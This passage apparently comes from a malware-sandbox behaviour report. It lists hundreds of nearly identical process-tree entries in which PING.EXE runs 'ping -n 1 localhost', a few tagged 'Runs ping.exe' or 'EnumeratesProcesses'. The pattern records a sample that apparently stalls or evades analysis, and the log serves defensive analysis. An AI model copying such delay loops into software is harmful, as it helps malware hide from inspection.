  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4440
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5104
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4828
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:220
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3536
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:64
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3772
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1068
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4972
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4404
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4256
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1996
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4524
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4628
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2660
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3428
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4388
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4908
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2096
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1452
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1316
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3612
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1956
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:732
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1152
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4732
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1816
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5108
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1536
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:796
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4416
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2652
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2848
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4776
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2232
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4144
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4964
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4424
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1960
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4276
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      Runs ping.exe
      PID:2816
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:224
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1680
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1328
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5044
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1344
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1288
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1804
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2972
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4356
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4408
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1320
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4392
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4652
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1808
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1792
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3040
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1408
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1740
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4700
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:648
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4420
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1028
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1352
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:884
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4296
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2140
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1392
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4728
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4580
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1676
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4276
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:928
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2060
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1640
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:384
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2428
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1680
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1328
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5044
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2448
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2640
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3924
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3688
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1336
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4324
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2284
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2128
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1260
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3720
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4828
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4612
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3536
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:64
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3320
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3772
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:628
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1632
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1068
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2832
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4972
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4404
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:216
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1272
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4964
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2288
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4424
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2172
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3276
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:428
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3620
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3404
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1504
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3908
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3840
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5076
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5044
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5040
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1288
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4752
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3924
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3688
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1336
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2284
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2368
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3720
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4828
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4612
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3536
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:64
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3320
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:628
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1632
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:556
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1068
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4972
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4136
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2232
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1492
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4144
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5004
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2200
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4424
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1392
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4728
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1728
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4580
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      Runs ping.exe
      PID:1676
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4376
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2816
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2060
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:224
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:384
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2860
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1680
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5092
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2080
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2132
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4868
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3684
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4372
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4840
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2748
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4384
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4052
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5028
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:632
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2580
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1920
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4492
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3124
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3548
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2808
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2348
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3576
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3044
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3740
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1008
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3244
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2308
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4588
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2940
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3376
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3400
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1096
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1672
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:716
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1116
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4848
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3184
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1192
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:352
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1992
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2264
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1064
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3708
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3160
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1704
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1964
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3016
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3884
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4484
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2788
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2196
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2176
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2544
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3088
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5052
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3736
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5076
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1468
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:780
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1916
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2296
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3932
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1752
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2384
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1904
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4876
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1984
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4768
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1480
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4436
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1896
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1268
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2696
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2912
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:768
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1328
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2428
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      Runs ping.exe
      PID:1640
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:928
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4276
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1960
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4428
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3988
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2288
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4964
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1272
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4340
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:216
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4404
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      Runs ping.exe
      PID:2832
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2896
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3772
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:936
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:220
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3208
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4432
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1260
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1684
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2128
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:948
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4324
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4348
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3700
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5116
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2640
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2448
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1344
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4396
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2192
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5036
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2864
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1516
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3604
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:400
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1176
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3328
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3456
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4464
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2504
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3804
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3816
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2200
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3424
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5112
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4308
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1760
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3780
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2252
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3476
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1972
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3692
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5108
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3888
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1536
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4076
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:796
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:944
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2372
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4456
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4764
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3808
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1312
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1768
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3704
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:3084
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1032
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4944
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:2908
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:5004
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4144
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:1492
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 1 localhost
      4⤵
      PID:4340
  - - C:\Windows\SysWOW64\PING.EXE
